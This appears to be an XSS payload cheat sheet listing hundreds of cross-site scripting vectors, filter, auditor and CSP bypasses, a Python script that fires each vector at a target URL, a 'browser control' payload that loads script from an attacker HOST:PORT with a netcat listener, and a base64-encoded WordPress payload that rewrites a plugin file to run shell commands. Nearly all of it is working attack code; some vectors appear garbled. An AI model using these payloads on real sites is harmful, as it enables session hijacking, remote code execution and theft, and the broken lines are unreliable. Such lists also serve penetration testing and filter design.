List of Typical Attack Vectors
<script>alert(1)</script>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BODY ONLOAD=alert('XSS')>
"><object onbeforescriptexecute=confirm(1)>
"><object onafterscriptexecute=confirm(0)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
<svg onload=alert1
>
x#<body onload=confirm('XSSPOSED')>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<script src=javascript:alert(1)>
"><img src=/ onerror=alert(2)>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:alert(1);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
<svg><set onbegin=alert(1)>
</script><svg><script>alert(1)//
"-alert(1)</script><script>
';onerror=alert;throw 1//
<x onmouseenter=alert(1)>
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
Script with XSS direct for URL
!/usr/bin/python
import urllib
import sys
import webbrowser
url = sys.argv[1]
vectors = sys.argv[2]
with open(vectors, 'r') as f:
for i in f:
try:
XSS = url + i
webbrowser.get('firefox')
webbrowser.open_new_tab(XSS)
except Exception as e:
print "Cannot open url"
Full list of vectors
HTML Context
Tag Injection <svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context
Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context
Code Injection
(escaping the escape)
\'-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
Without Parenthesis <svg onload=alert1
>
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
Filter Bypass
Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top"al"+"ert"
al\u0065rt(1)
top'al\145rt'
top'al\x65rt'
Body Tag <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onmouseenter=alert(1)>hover me!
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
Code Reuse
Inline Script
<script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1 <X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1='1'onxxx=1
<x 1="1"onxxx=1 <[S]x onx[S]xx=1
[S] = stripped char or string <x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1='
Browser Control
<svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input Single Input (script-based)
'onload=alert(1)><svg/1=' '>alert(1)</script><script/1='
/alert(1)</script><script>/
Triple Reflection
Single Input Single Input (script-based)
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="
<svg/1=' /</script>'>alert(1)/<script/1='
Multi Input
Double Input Triple Input
p=<svg/1='&q='onload=alert(1)> p=<svg 1='&q='onload='/&r=/alert(1)'>
Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><x><script>alert(1)</x>
<svg><use xlink:href='data:image/svg+xml,<svg id="x"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<embed xmlns="http://www.w3.org/1999/xhtml"
src="javascript:alert(1)"/></svg>#x'>
<svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYn
J1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIge
G1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsi
Pg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3h
odG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYW
luKSIvPjwvc3ZnPg==#brute>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload
Injection in Filename
"><img src=1 onerror=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
Google Chrome
Auditor Bypass
(up to v51) <script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
"><link rel=import href=data:text/html,<script>alert(1)</script>
"><embed allowscriptaccess=always src=//brutelogic.com.br/2.swf#
<embed allowscriptaccess=always src="//brutelogic.com.br/2.swf#
"><object allowscriptaccess=always data=//brutelogic.com.br/2.swf#
<object allowscriptaccess=always data="//brutelogic.com.br/2.swf#
"><base href=//HOST/
<base href="//HOST/
PHP File for
XHR Remote Call
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC
<base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE
<script/src="data:,eval(atob(location.hash.slice(1)))//#
eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
Multi Context Source-based
</script>"-alert(0)-"><svg onload=';alert(1);'>
DOM-based
//3334957647/0/?0=">"<img src='-alert(1)-' onerror=";alert(1);">
CSP Bypass <script/src=/PATH/PAGE.json?callback=alert(1)//></script>
Shortest Event Handler
<svg><animate attributename=x end=1 onend=alert(1)>
Best-fit Mappings Uppercase
<SCRİPT>alert(1)</SCRİPT>
<SCRİPT/SRC=data:,alert(1)>
Overlong UTF-8
ʺ><svg onload=alert(1)>
%CA%BA%EF%BC%9E%EF%BC%9Csvg onload
%EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
In URLs: & => %26 , # => %23 , + => %2B
XSS bypass til chrome v60
<link rel=import href="data:,%%0D3Cscript>alert(1)%%0D3C%%0D2Fscript>
<iframe src="javascript:alert(1)%%0D3C!—
Chrome v62
%3Cform%3E%3Cinput+type=image+src=//domain/file.jpg+formaction=%22javascript:alert(1)%%0D3C!-%2D
IE11 og Microsoft edge
%27;onerror=alert;throw%271
XSS I XML-filer
<:script xmlns:="hxxp://www.w3.org/1999/xhtml">alert(1)</_:script>
DOM XSS bypass:
\74svg o\156load=alert\501\51>
ASP filter bypass:
%u003csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uff1csvg onload=alert(3)>